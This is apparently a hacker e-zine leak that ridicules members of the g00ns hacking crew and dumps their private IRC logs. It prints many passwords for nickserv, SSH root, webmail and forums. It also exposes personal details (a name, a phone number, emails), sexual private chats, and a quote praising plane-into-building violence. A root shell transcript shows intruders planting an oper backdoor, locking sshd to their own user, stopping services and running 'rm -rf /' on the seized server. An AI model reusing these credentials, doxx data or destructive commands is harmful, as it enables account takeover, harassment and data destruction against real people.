~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In any large hacking community there are two kinds of people at the top. The first is not going anywhere. They are either unskilled (even for that level) and lucky to be there (probably there through patronage), or they are just happy with the benefits from being at the top of that level. The second group is smaller, and contains a couple of people who have the talent, willingness to learn, dedication and time to move forward. There are a couple of those at g00ns, and we wish them good luck. Don't settle for being at the top of an organization that sells positions on a forum, whose competitors are The Defaced and The Regime. But you can't just look for the next cool hacker website, you dig? Try to find smarter people, and they will not always advertise. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It's not over yet kids! Time for profiles! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // z3r0 // z3r0 -> nickserv: identify r3xleoP3@Dm3s!!!#&6^ g00ns #private password and skype password: ismokedyoustupid z3r0 on zf03: What exactly is Zf0 3? it looks like a article about how Zf0 just goes around owning people. z3r0 on zf03: HAH the irc logs are a comedy goldmine. -19:48:59- (z3r0) we will have to introduce you to illwill -19:49:03- (z3r0) hes our asm guru -20:02:29- (z3r0) most kiddies cant even run a perl script -20:08:55- (z3r0) basically our credo is we hate neophytes -20:16:22- ~ (Psyop) Do you read many zines? -20:16:27- (z3r0) sometimes -20:16:28- (z3r0) depends -20:16:39- (z3r0) i read zf0's Always good to have fans. // clorox // clorox -> nickserv: identify loldongs "I'm planning on doing some irl raids myself here shortly. I think the target deserves to be targeted and deserves whatever actions come out of it. I don't understand the current direction the raid is taking look if you are going to spread documents and call it a raid i think thats rather ridiculous there are thousands of other sites that do that already. Words are for Discourse Violence is for Change, look its tough to even type this but paper airplanes don't change anything...they don't they just don't. If you make a paper airplane and hand it off to people and try to show them information nothing will change. What changes things are when airplanes crash into shit and do damage, that is really all today's world is about; the level of importance is directly related to the amount of damage something has done. Don't hand people paper...slam a fucking plane into a building and force the shit on them." What's the moral there, that terrorism is an acceptable and admirable way of accomplishing your goals? CLOROX IS A TERRORIST WANNABE!!!! Hand the man a turban! // g00ns is SERIOUS FUCKING BUSINESS cloroxsecure (2:38:16 AM): if i see someone fucking around with the community we are going to expose them cloroxsecure (2:38:25 AM): you were exposed clorox -> Depravus: explain to me why g00ns are lame? Depravus -> clorox: Personal army shit, internet tough guy shit, etc. clorox -> Depravus: like? Depravus -> clorox: Like typical 13 year olds that figured out how to use the in ternet clorox -> Depravus: first off none of us are 13 years old.... 18+ and most of u s are older than that... secondly we are not anon we do what we want Depravus -> clorox: Dude you don't have to be 13 to act like a 13 year old Depravus -> clorox: You could be 49 for all I care Depravus -> clorox: And that mentality is why you're lame Depravus -> clorox: "We do what we want" clorox -> Depravus: why do you think we act like 13 year olds Depravus -> clorox: Which gives rise to internet tough guy mentality clorox -> Depravus: do you not do what you want? clorox -> Depravus: sorry we've pulled anon out of situations they couldn't handle clorox -> inky_: $servidor='' unless $servidor; clorox -> inky_: my $porta='6667'; clorox -> inky_: my @canais=("#!!g00ns"); clorox -> inky_: my @adms=("br3ttch4nce"); inky_ -> clorox: are any of the 2.6.9 kernels vuln? they seem to be most popular clorox -> inky_: milw0rm vmsplice // ZF0 much help, great success! Genocide -> clorox: i miss #irclogs Genocide -> clorox: :[ clorox -> Genocide: ditto Ok the real funny thing about clorox is his relationship with theswellseason (IRC whore). The entire time they were dating she was flirting with other guys on IRC. The only guy she didn't flirt with was clorox, who was too busy taking g00ns very fucking seriously! She sure likes the attention she gets when she shows titties. tribaL -> sCuZz: homeboys gonna get played like the rest tribaL -> sCuZz: but you know hes not going to listen tribaL -> sCuZz: not to me tribaL -> sCuZz: not to you tribaL -> sCuZz: not to z3r0 We present to you, the chronological IRC life of theswellseason! theswellseason -> d0ct0r: my dad, when he found out I'd lost my virginity, started crying. and I just sat there totally stonefaced because i knew if I said anything, I'd burst into laughter d0ct0r -> theswellseason: wtf theswellseason -> d0ct0r: lol theswellseason -> d0ct0r: yeah theswellseason -> d0ct0r: I know theswellseason -> d0ct0r: my dad is such a pussy sometimes d0ct0r -> theswellseason: my mom was like d0ct0r -> theswellseason: 3 years ago d0ct0r -> theswellseason: 'when you going to pop your cherrry' d0ct0r -> theswellseason: i was like d0ct0r -> theswellseason: huh d0ct0r -> theswellseason: i remember this theswellseason -> d0ct0r: my parents are really religious though d0ct0r -> theswellseason: cause i was like, how could i pop...my cheer.y d0ct0r -> theswellseason: cherry* theswellseason -> d0ct0r: lol d0ct0r -> theswellseason: one of my problems is theswellseason -> d0ct0r: my parents view the whole "sex before marriage" thing as being really bad d0ct0r -> theswellseason: i like to go for the 0 size jean girls sCuZz -> theswellseason: im envious of clorox sCuZz -> theswellseason: and im wanking theswellseason -> sCuZz: It's sideways, but, observe: http://tinypic.com/view.php?pic=2zrnr7a&s=3 theswellseason -> sCuZz: http://tinypic.com/view.php?pic=2r3b0vp&s=3 theswellseason -> sCuZz: blurry, but somewhat full body sCuZz -> theswellseason: you have an amazing ass theswellseason -> sCuZz: I can't believe I'm showing you this theswellseason -> sCuZz: I'm only adding to the fuel sCuZz -> theswellseason: i do have to admit its kinda hot theswellseason -> sCuZz: jesus, clorox is going to have my head for being such a flirt theswellseason -> sCuZz: why does the g00ns irc server not allow ssl connections? sCuZz -> theswellseason: stop being sketchy theswellseason -> sCuZz: dude, clorox just got a webcam sCuZz -> theswellseason: have you seen his cock? theswellseason -> sCuZz: no sCuZz -> theswellseason: and hes seen you nude sCuZz -> theswellseason: ? theswellseason -> sCuZz: yeaaaaah theswellseason -> sCuZz: trust me theswellseason -> sCuZz: I don't find that fair either sCuZz -> theswellseason: lol sCuZz -> theswellseason: what if his cock is like sCuZz -> theswellseason: 4 inches? sCuZz -> theswellseason: or hes pushing 5 theswellseason -> sCuZz: er, I'm really fucking tight anyways, so that won't be a big deal sCuZz -> theswellseason: thats not fair theswellseason -> sCuZz: what? sCuZz -> theswellseason: you telling me your tight theswellseason -> sCuZz: seriously, I don't have big fingers and it's pushing it to get two of my fingers in there. theswellseason -> sCuZz: lol theswellseason -> sCuZz: shit theswellseason -> sCuZz: now I'm just being mean sCuZz -> theswellseason: wow sCuZz -> theswellseason: i dont believe that sCuZz -> theswellseason: :( theswellseason -> sCuZz: okay theswellseason -> sCuZz: well, two fit fine sCuZz -> theswellseason: haha theswellseason -> sCuZz: but like, I can't put three side-by-side sCuZz -> theswellseason: thats fucked up sCuZz -> theswellseason: see sCuZz -> theswellseason: you do like to tease sCuZz -> theswellseason: does it hurt to masturbate theswellseason -> sCuZz: well... no theswellseason -> sCuZz: you just have to be careful? theswellseason -> sCuZz: lol, I don't even bother with panties theswellseason -> sCuZz: I'm just straight nude sCuZz -> theswellseason: hot theswellseason -> sCuZz: lol theswellseason -> sCuZz: clorox is going to kill me for telling you all this lol theswellseason -> sCuZz: I'll give you noodz if you'll give me cock pics theswellseason -> sCuZz: so that I can make clorox jealous sCuZz -> theswellseason: i so know this is a setup theswellseason -> sCuZz: how so? sCuZz -> theswellseason: but if it means clorox gets to see my cock sCuZz -> theswellseason: ill be happy theswellseason -> vgx: enviesecure@gmail.com theswellseason -> vgx: I'm dating a g00n theswellseason -> vgx: I take everything with a grain of salt botkip -> theswellseason: I wouldn't fuck with botkip if I were you... people are reading the logs right now // if only you knew theswellseason -> Ninth_: he was being an ass theswellseason -> Ninth_: and there was someone else that wanted me to "run away with him" theswellseason -> Ninth_: and this other person... idk... was charming Ninth_ -> theswellseason: work hard, stick with him, honestly, that will mean so much more than anything else, knowing that you are devoted enough to stay together. theswellseason -> Ninth_: and I almost wanted to cheat, but like... idk theswellseason -> sCuZz: I was a whore before I met clorox theswellseason -> TokyoFox: old pic is old, but: http://tinypic.com/view.php?pic=2zqfonb&s=3 theswellseason -> sCuZz: http://tinypic.com/view.php?pic=jiltkx&s=3 theswellseason -> sCuZz: http://tinypic.com/view.php?pic=35jbc4g&s=3 ^ emo hair lol..... Zombocom -> theswellseason: I love you Emmaleigh theswellseason -> Zombocom: I'm going to the coffee shop later, I'll talk to you then theswellseason -> Zombocom: I love you too James Anonzz -> theswellseason: This is a pic of me and my bitch Anonzz -> theswellseason: http://farm3.static.flickr.com/2325/2337209376_d57f1c43d4_o.jpg theswellseason -> Zombocom: Because you are theswellseason -> Zombocom: you're... just amazing theswellseason -> Zombocom: what do you mean you misssed me? theswellseason -> Zombocom: I was gone for all of... five minute? theswellseason -> ServicesUp: you're in #programming theswellseason -> ServicesUp: you're a programer? ServicesUp -> theswellseason: yes // That might impress theswellseason, but... ServicesUp -> #programming: is IP based on MAC address? theswellseason -> Deltantor: you're silly theswellseason -> Deltantor: they're just tits Deltantor -> theswellseason: I just like yours a lot >_> they are...perfect Deltantor -> theswellseason: http://tinypic.com/view.php?pic=866pl6q&s=1 Deltantor -> theswellseason: don't go posting that places theswellseason -> p00h: p00h, clorox could root ANYONE p00h -> theswellseason: clorox doesnt know about rooting // keeps calling her babygirl // gave her a bellavendetta.com user account theswellseason -> p00h: I think clorox could handle me going on a trip theswellseason -> p00h: lol p00h -> theswellseason: lol theswellseason -> p00h: we're just friends, right? p00h -> theswellseason: why, what would u say if i ran porn sites p00h -> theswellseason: u still have the nipple peircings? theswellseason -> p00h: yep p00h -> theswellseason: nice p00h -> theswellseason: they look nice theswellseason -> p00h: yeop p00h -> theswellseason: i like the studs theswellseason -> p00h: lol I like them p00h -> theswellseason: im sure u have heard this p00h -> theswellseason: but ur nipples like really hot p00h -> theswellseason: they are perfect looking theswellseason -> p00h: I have heard that // I just can't resist dropping any pm where someone begs someone to be private theswellseason -> p00h: when the other guy says he loves me, I believe it theswellseason -> p00h: I'm just scared that if I leave clorox he'll turn g00ns on me and get them to ruin my life theswellseason -> p00h: z3r0 has threatened to do so if I hurt clorox theswellseason -> p00h: that's why you cannot EVER tell him this theswellseason -> p00h: I'm gonna try and back out peacefully p00h -> theswellseason: it would be theswellseason -> p00h: but if he knows it's for another guy, I'm done p00h -> theswellseason: that would be the safest thing p00h -> theswellseason: ya theswellseason -> p00h: so please please please p00h p00h -> theswellseason: i won't say anything theswellseason -> p00h: don't tell anyone p00h -> theswellseason: don't worry sCuZz -> tribaL: whats the deal with theswellseason? tribaL -> sCuZz: idk tribaL -> sCuZz: why tribaL -> sCuZz: shes dating clorox IRL THO sCuZz -> tribaL: i know sCuZz -> tribaL: she tells me shit all the time sCuZz -> tribaL: and it just seems like shes being an e whore theswellseason -> p00h: I've fucked a chick before p00h -> theswellseason: but not with a penis theswellseason -> p00h: well theswellseason -> p00h: does a strapon count? p00h -> theswellseason: no theswellseason -> p00h: shit theswellseason -> p00h: that's his IP p00h -> theswellseason: how do u know theswellseason -> p00h: because he just visted a page that I had set up specifically to get his IP theswellseason -> p00h: the only other IP to have visited that page is mine theswellseason -> p00h: and that's not my IP p00h -> theswellseason: hehe theswellseason -> p00h: so it must be his p00h -> theswellseason: you are such a haxor theswellseason -> p00h: lol theswellseason -> p00h: aren't I though? theswellseason -> p00h: see, I may need to learn, but hell p00h -> theswellseason: u are a hax0r p00h -> theswellseason: im proud of u theswellseason -> p00h: I have a few really useful tricks up my sleeve already theswellseason -> p00h: whatdya gonna do, p00h? theswellseason -> p00h: I think you'd get in the room and like, cum prematurely from the nervousness of being around a woman like me And this basically sums it up nicely... sCuZz -> tribaL: lol she told me that when they broke up sCuZz -> tribaL: he was like saying he wanted to spend the rest of his life with her // pr0be // tribaL -> nickserv: identify h4x0r! pr0be -> nickserv: identify h4x0r! For anyone who didn't know, tribaL == pr0be. He was too embarassed to carry on under his nick, so he concocted a stupid story and has been living it. tribaL -> sCuZz: they think im from anonymous tribaL -> sCuZz: i can't let them know im pr0be ;( tribaL -> luna: switching from pr0be to tribal because of my dox One common thread in pr0be's IRC messages is his (emotional) insecurity and jealousy. Always bitching about someone, like clorox. ~~~~~~~~~~~~~~~~~~~~~~~~~ For the past few months, Alot of you have met the new guy tribaL. TribaL and i go back quite a bit, and he is the most trustworthy individual on the net that i have met thus far. The truth is, I have been training a replacement. I have been here for quite some time, and real life is starting to take over. With that said, it is about the time that i step down. I will not join any other crew. g00ns is and will always be my home, and if real life slows down perhaps i will be back. Most of you can contact me, but you know i just have not been online as much as i used to be anymore. Respect tribaL, he is one crazy motherfucker. Later guys oh, and i aint gay. ~~~~~~~~~~~~~~~~ g00ns.net motd God i'm going to miss this place so fucking much. Just remember, Things aren't like they used to be. For the most part, you are on your own. Watch your own ass, and do what you have to, to protect it. Even if g00ns were to end tomarrow, Nobody will ever be able to break our spirit. Nobody will ever be able to tell us we didn't own the internet. Watch out bro, And its never too late to get out while your ahead. People will listen to you - You have a good head on your shoulders. Maybe down the road we will start over, With all of the knowledge of our mistakes the first time. This isn't the end. Whoever attacks may win the battle, But they will never win the war. If g00ns shuts down, Its not the end. We still have our cliche- our group of guys that we will hang out with. We are smarter when it comes to getting shit done and not getting caught. We will prevail. You know if you need anything, i'll help you to my fullest extent. You're my homie. Walk light, And keep your head on a swivel. Most of the people out here are snakes. - [g00n] motherfucking pr0be ~~~~~~~~~~~~~ pr0be temporary h4cky0u forum pass (probably changed by now) 164187e6 // z3r0 sticks it to pr0be I was^H^H^Ham sorry to inform you that because of your ^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hthat since you have been messing with our staff I will have to let you go. I'm soor^H^Hrry but you have to go. We do not want to^H^Hyou in the com^Hmmunity anymore. pr0be bearshare: polxx/104diam loSt -> tribaL: riot wants me to give him ops in g00ns chan again loSt -> tribaL: should i? tribaL -> loSt: no tribaL -> loSt: just ignore it loSt -> Riot: ill talk to tribal and see if im allowed to ops you Riot -> tribaL: can i get my goddamn ops. or at least voice. Riot -> tribaL: Dude, am I ever getting my ops back and shit tribaL -> Riot: stop tribaL -> Riot: socialing me tribaL -> Riot: dude tribaL -> Riot: why tribaL -> Riot: are y tribaL -> Riot: ou tribaL -> Riot: trying tribaL -> Riot: to social me Riot -> tribaL: ... Riot -> tribaL: No Riot -> tribaL: like I'm pissed as fuck tribaL -> Riot: socialed Riot -> tribaL: For real are you all just going to keep being cocksuckers Riot -> tribaL: or what Riot -> tribaL: because z3r0 goes and tells jon Riot -> tribaL: that I told g00ns he's been giving people up <--- this is true, z3r0 is an informant. No joke. tribaL -> Riot: idonno Riot -> tribaL: Like its some fucking bullshit tribaL -> Riot: im just smoking Riot -> tribaL: and i'm steps away from fucking walking bro. tribaL -> Riot: and trying to hack f bis Riot -> tribaL: I put my trust fucking time and again into g00ns Riot -> tribaL: and you fuckers just throw it back in my fucking face dude. tribaL -> Riot: i can imagine tribaL -> inky_: tribaL -> inky_: SSH port 3785 tribaL -> inky_: User: root tribaL -> inky_: Pass: zr0mg123 tribaL -> inky_: dont tell anybody i gave it to you # Talking to yourself is not safe, ZF0 can hear you. tribal -> tribal: clorox sucks cock tribal -> tribal: a59 sucks cock # he keeps bumming money off people, it's pathetic tribaL -> loSt: got 10 bucks i canborrow loSt -> tribaL: nah man tribaL -> loSt: feck FuRY -> tribaL: cause z3r0 and clorox are running with there reputations.... FuRY -> tribaL: they havent done anything in years FuRY -> tribaL: lol tribaL -> FuRY: i have to teach clorox shit FuRY -> tribaL: :\ tribaL -> FuRY: z3r0 tribaL -> FuRY: im not going to sell him out FuRY -> tribaL: is dead FuRY -> tribaL: :P tribaL -> FuRY: but lets just say his strong points are in what they teach in networking class core -> tribal: yo tribal -> core: yo core -> tribal: i have one you can use core -> tribal: not mine though tribal -> core: i will suck yourfucking edick core -> tribal: user: jojoman112 core -> tribal: pw: syense1 tribal -> core: omfg tribal -> core: ty tribal -> sCuZz: i started a new irc tribal -> sCuZz: for the people we choose tribal -> sCuZz: its a private irc tribal -> sCuZz: p.60z.org tribal -> sCuZz: connect there sCuZz -> tribal: i thought i had one set :/ tribal -> sCuZz: your opper is !beanerl0ve! // sCuZz // sCuZz -> nickserv: identify HsNS3Sksd%SmfjuuAxT disruptiv -> sCuZz: u dont think somebody has this ircd rewted riht now disruptiv -> sCuZz: somebody is sniffin somebodys shit disruptiv -> sCuZz: all the time Welcome to sn00g Forums Username: geezus Password: nukes77g1 acircle.us forums Username: sCuZz Password: nukes77g2 // spl0iT // spl0iT -> nickserv: identify bejtm540 // spl0it goes to daddy clorox for hacking help spl0iT -> clorox: www.scorpiontek.org // Mr. Tough Guy spl0iT -> d0ct0r: said he doesn't know why he was targetted and was wondering what type of sick game it was spl0iT -> d0ct0r: i told him it was a harsh lesson in security spl0iT -> d0ct0r: we are the g00ns spl0iT -> d0ct0r: expect us spl0iT -> d0ct0r: Yes, we were hacked. By #[7m<80><9C>we#[7m<80><9D> I mean me, Aaron, and our podcast - which are all hosted on the same server. I#[7m<80><99>m not gonna post a link to the site that supposedly hacked us just because it#[7m<80><99>s b ad taste. Why we were hacked? I don#[7m<80><99>t know. loSt -> spl0iT: d0ct0r is on 24/7 and refuses to learn loSt -> spl0iT: he even takes highschool from home loSt -> sCuZz: im turning spl0it right now spl0iT -> tribaL: what's the command to exit nano spl0iT -> tribaL: i used putty to connect spl0it Your login is: p10067292 Your password is: 4g50y11x NNTP Address/News Server: europe.newsdemon.com, useast.newsdemon.com Welcome to sn00g Forums Username: spl0iT Password: TheTaCSS74 // loSt // loSt's thing is that he'll do anything to move up in g00ns, like make them money and suck up. And he likes to hand out passes in IRC. :D loSt -> detrez: Username: detrez@j3ws.com loSt -> detrez: Password: rg8lTQFl loSt -> detrez: Pop3 Server: mail.j3ws.com loSt -> detrez: Smtp Server: mail.j3ws.com loSt -> detrez: oh, you can also login through here as well: loSt -> detrez: j3ws.com/webmail loSt -> detrez: naygor.com/webmail loSt -> detrez: Username: detrez@naygor.com loSt -> detrez: Password: voJLp90C loSt -> detrez: Pop3 Server: mail.naygor.com loSt -> detrez: Smtp Server: mail.naygor.com loSt -> detrez: Username: hang.the@naygor.com loSt -> detrez: Password: t5ybTINh loSt -> detrez: Pop3 Server: mail.naygor.com loSt -> detrez: Smtp Server: mail.naygor.com deTrez -> loSt: awesomeeeee loSt -> detrez: Username: dirty.filthy.greedy.scumbag@j3ws.com loSt -> detrez: Password: SkAKU1eP loSt -> detrez: Pop3 Server: mail.j3ws.com loSt -> detrez: Smtp Server: mail.j3ws.com loSt -> clorox: [17:01] hey hun loSt -> clorox: [17:01] hey loSt -> clorox: [17:01] how you been? loSt -> clorox: [17:02] bad. i went wildcard. looking to make some sales , know any buyers? loSt -> clorox: [17:02] watcha mean wildcard/ loSt -> clorox: [17:03] off the grid, and unpredictable. im running. loSt -> clorox: [17:04] ooo loSt -> clorox: [17:04] fedz after you ? loSt -> clorox: [17:04] or people? loSt -> clorox: [17:05] alphabet soup.pick your acronym loSt -> clorox: [17:05] lol andy -> Joshua: loSt says he will keep ANYONE you want gzlined if he gets the money CuNt -> loSt: need the warez-bb password again loSt -> CuNt: 547745 CuNt -> loSt: and its rocksuperman right? loSt -> tribaL: [19:55] im just doing what i do to bring in money loSt -> tribaL: [19:55] only temp to help with the load of threads loSt -> tribaL: [19:55] Which proves g00ns is only about money now loSt -> tribaL: [19:55] Whoever brings in most money gets most power // core // core -> nickserv: IDENTIFY h4xorwooT On Sat, Mar 15, 2008 at 6:42 PM, wrote: > > hey mom this is carroll, my new email address Welcome to StumbleUpon! Here's your login info: Email: core@j3ws.com Password: damiro Dear core1516161,

We have received several complaints concerning= your use of the Stickam service. Specifically, we have been informed that = you have exposed yourself and/or others nude/partially nude to other member= s/users of the service.

..etc(see his spool)a core = Cormac O'Riordan according to paypal Woulf Den Imprinting just sent you money with PayPal. ($2430! fuck!) `This email confirms that you have paid Valve Corp.=2412.04 USD using PayPal. Phone: +353 0864054913 Welcome to Los Santos Role Play forums Username: core Password: hacker123 core321@live.com his other email // a59 // a59 -> nickserv@anonymous.services: identify snoop1 a59 -> sixthreenine: THIS IS A FUCKIN HACKER TOOL a59 -> sixthreenine: I AM A FUCKIN HACKER TOOL a59 -> sixthreenine: DONT TALK SHIT a59 -> sixthreenine: NEVER a59 -> sixthreenine: and dont EVER question my AUTHORITY CAUSE IWILL FUCKIN HACK U' ~~~~~~~~~~~~~~~ These kids are so funny. Shortly before release (and long after we had taken anything we wanted from g00ns) we decided to have some fun with them. Here are the IRC logs of us trolling and rming g00ns.net. A lot of others jumped on the troll wagon and everyone had a great time! We fixed up the box a bit: [root@demon2 Unreal3.2.7]# cat unrealircd.conf loadmodule "src/modules/commands.so"; loadmodule "src/modules/cloak.so"; me { name "irc.evilcoders.net"; info "Partyvan IRC"; numeric 11; }; admin { "tribaL"; "tribal@g00ns.net"; }; class clients { pingfreq 180; maxclients 5000; sendq 1000000000; recvq 8000; }; class servers { pingfreq 290; maxclients 100; /* Max servers we can have linked at a time */ sendq 999999999; connfreq 100; /* How many seconds between each connection attempt */ }; oper zf0 { from { userhost "*@*"; }; password "g00nspwnage"; class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; }; }; [root@demon2 Unreal3.2.7]# /etc/init.d/directadmin stop Stopping DirectAdmin: [ OK ] [root@demon2 Unreal3.2.7]# /etc/init.d/httpd stop Stopping httpd: [ OK ] [root@demon2 Unreal3.2.7]# /etc/init.d/lsws stop [root@demon2 Unreal3.2.7]# /etc/init.d/mysqld stop Shutting down MySQL.. [ OK ] [root@demon2 Unreal3.2.7]# /etc/init.d/nessusd stop Shutting down Nessus services: [ OK ] [root@demon2 Unreal3.2.7]# /etc/init.d/proftpd stop Shutting down proftpd: [ OK ] [root@demon2 ~]# /etc/init.d/sshd restart Stopping sshd: [ OK ] Starting sshd: [ OK ] [root@demon2 ~]# cat /etc/ssh/sshd_config # $OpenBSD: sshd_config,v 1.73 2005/12/06 22:38:28 reyk Exp $ Banner /etc/ssh/sshd-banner # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/local/bin:/bin:/usr/bin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options change a # default value. Port 3000 #Protocol 2 Protocol 2 #AddressFamily any #ListenAddress #ListenAddress :: # HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h #ServerKeyBits 768 # Logging # obsoletes QuietMode and FascistLogging #SyslogFacility AUTH SyslogFacility AUTHPRIV #LogLevel INFO # Authentication: #LoginGraceTime 2m #PermitRootLogin yes #StrictModes yes #MaxAuthTries 6 #RSAAuthentication yes #PubkeyAuthentication yes #AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #RhostsRSAAuthentication no # similar for protocol version 2 #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! #PasswordAuthentication yes #PermitEmptyPasswords no PasswordAuthentication yes # Change to no to disable s/key passwords #ChallengeResponseAuthentication yes ChallengeResponseAuthentication no # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # Set this to 'yes' to enable PAM authentication, account processing, # and session processing. If this is enabled, PAM authentication will # be allowed through the ChallengeResponseAuthentication mechanism. # Depending on your PAM configuration, this may bypass the setting of # PasswordAuthentication, PermitEmptyPasswords, and # "PermitRootLogin without-password". If you just want the PAM account and # session checks to run without PAM authentication, then enable this but set # ChallengeResponseAuthentication=no #UsePAM no #UsePAM yes # Accept locale-related environment variables AcceptEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES AcceptEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT AcceptEnv LC_IDENTIFICATION LC_ALL #AllowTcpForwarding yes #GatewayPorts no #X11Forwarding no X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PrintMotd yes #PrintLastLog yes #TCPKeepAlive yes #UseLogin no #UsePrivilegeSeparation yes #PermitUserEnvironment no #Compression delayed #ClientAliveInterval 0 #ClientAliveCountMax 3 #ShowPatchLevel no #UseDNS yes #PidFile /var/run/sshd.pid #MaxStartups 10 #PermitTunnel no # no default banner path #Banner /some/path # override default of no subsystems Subsystem sftp /usr/libexec/openssh/sftp-server AllowUsers ZF0PWN [root@demon2 ~]# rm -rf /* rm: cannot remove `/aquota.group': Operation not permitted cannot remove `/aquota.user': Operation not permitted cannot remove directory `/backup': Device or resource busy cannot remove directory `/boot': Device or resource busy [root@demon2 ~]# And we trolled: --- Log opened Wed May 07 11:50:55 2008 11:50 < r00tr00t> welcome to the zf0 rmage 11:50 < Angyl> for the lulz 11:50 < ECB> hmm 11:51 < Angyl> and auctuioning it off on mids 11:51 <+theswellseason> Zombocom why are you such a faggot 11:51 <+theswellseason> I can't believe I thought I loved you Zombocom 11:51 < boon> SAY GOOD NIGHT G000ns 11:51 -!- Slowpoek is now known as theswelllseason 11:51 < r00tr00t> [root@demon2 ~]# ls /home/g00ns 11:51 < r00tr00t> ls: /home/g00ns: No such file or directory 11:51 < theswelllseason> lol 11:51 < r00tr00t> you have been rm'ed 11:51 < boon> TOODLEOOOO 11:51 < Angyl> swell. 11:51 < r00tr00t> bye 11:51 < Angyl> did i ever show you the pic 11:51 < Angyl> of riot 11:51 < Angyl> looking like an epic faggot 11:51 < boon> hahaha you guys dont even know :( 11:51 <&FuRY|Shmoke> `kb r00tr00t 11:51 < boon> lolz 11:51 <&FuRY|Shmoke> :( 11:51 <+theswellseason> actually I think you did 11:52 < theswelllseason> lol we just got hacked 11:52 < Angyl> http://i32.tinypic.com/xoozlg.jpg that one? 11:52 <%p00h> :/ 11:52 < theswelllseason> looooooool 11:52 < theswelllseason> `staff 11:52 < boon> lol 11:52 <+theswellseason> wtf who is theswelllseason 11:52 < theswelllseason> i am slowpoke :P 11:52 <+theswellseason> HAHAHAHAHAHAHAHAHAHA 11:52 < theswelllseason> <3 ^_^ 11:52 <+theswellseason> HAHAHAHAHAHAHAHAHAHAHAHAHA 11:52 < Slowpoke> oh shit what the hell 11:52 < Angyl> o.o 11:52 < theswelllseason> angyl = selfish 11:52 < Slowpoke> Oh 11:52 < boon> its fun that your last messages will be from the whore that is theswellseason 11:53 <+theswellseason> Angyl that is hilarious 11:53 < theswelllseason> slowpoke = angyl 11:53 <+theswellseason> poor guy 11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke] 11:53 < boon> and soo nthe world will see your sexy pics 11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns 11:53 <+Zombocom> dude, swell's not a whore 11:53 -!- mode/#g00ns [+b *!*@FB370F60.35B0F1AB.6B794A7F.IP] by FuRY|Shmoke 11:53 < ECB> WHAAT ABOUT MY SEXY PICS 11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke] 11:53 < Angyl> yes she is 11:53 < ECB> IM FUCKING SEXY 11:53 < Angyl> quit defending your irc girlfriend 11:53 <+Zombocom> no she's not 11:53 < Angyl> shes proud of being a whore 11:53 -!- FuRY|Shmoke [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has quit [Killed (r00tr00t (faggot))] 11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns 11:53 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #g00ns 11:53 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ 11:53 <+theswellseason> Angyl you best not be talkin shit :P 11:53 <%p00h> lol 11:53 < Slowpoke> theswellseason sux 11:53 < Slowpoke> D: 11:54 -!- theswellseason is now known as DickMonkey 11:54 < Angyl> im not 11:54 < ECB> lol 11:54 < Angyl> im just saying your a whore baby 11:54 < ECB> ok im gonna shower niggas 11:54 <+DickMonkey> I ain't swell 11:54 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has quit [Killed (januszeal (who are you))] 11:54 -!- theswelllseason is now known as theswelseason 11:54 < ECB> ill talk to you bitches later 11:54 -!- Zombocom is now known as theswellseason 11:54 -!- DickMonkey is now known as Zombocom 11:54 <+theswellseason> lol 11:54 -!- notherejack [notjack@48A9411C.15EBAEA.ED99F467.IP] has quit [Ping timeout] 11:54 <+Zombocom> god since when does Zombocom have voice in here 11:54 <+theswellseason> lol 11:55 < Angyl> since he started fucking you 11:55 <+theswellseason> LOL 11:55 <+theswellseason> angyl 11:55 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns 11:55 < ECB> lol 11:55 <+theswellseason> we're back to normal 11:55 <+theswellseason> I'm swell again 11:55 <&FuRY> everyone join irc.partyvan.fm 11:55 <+Zombocom> and I'm Zombocom 11:55 < Murdoc> osht angyl is getting bitchy :[ 11:55 < Murdoc> break out the xanax 11:55 < Slowpoke> asl Murdoc :) 11:55 < ECB> NO GIMME THE XANAX 11:55 <+Zombocom> Angyl gets bitchy when she gets confused 11:55 < ECB> SHIT IM ALMOST OUT 11:55 < Murdoc> 40/m/basement 11:55 < Slowpoke> 12/f/uk u? 11:55 < Slowpoke> :) 11:56 < Slowpoke> aww :> 11:56 -!- theswelseason is now known as 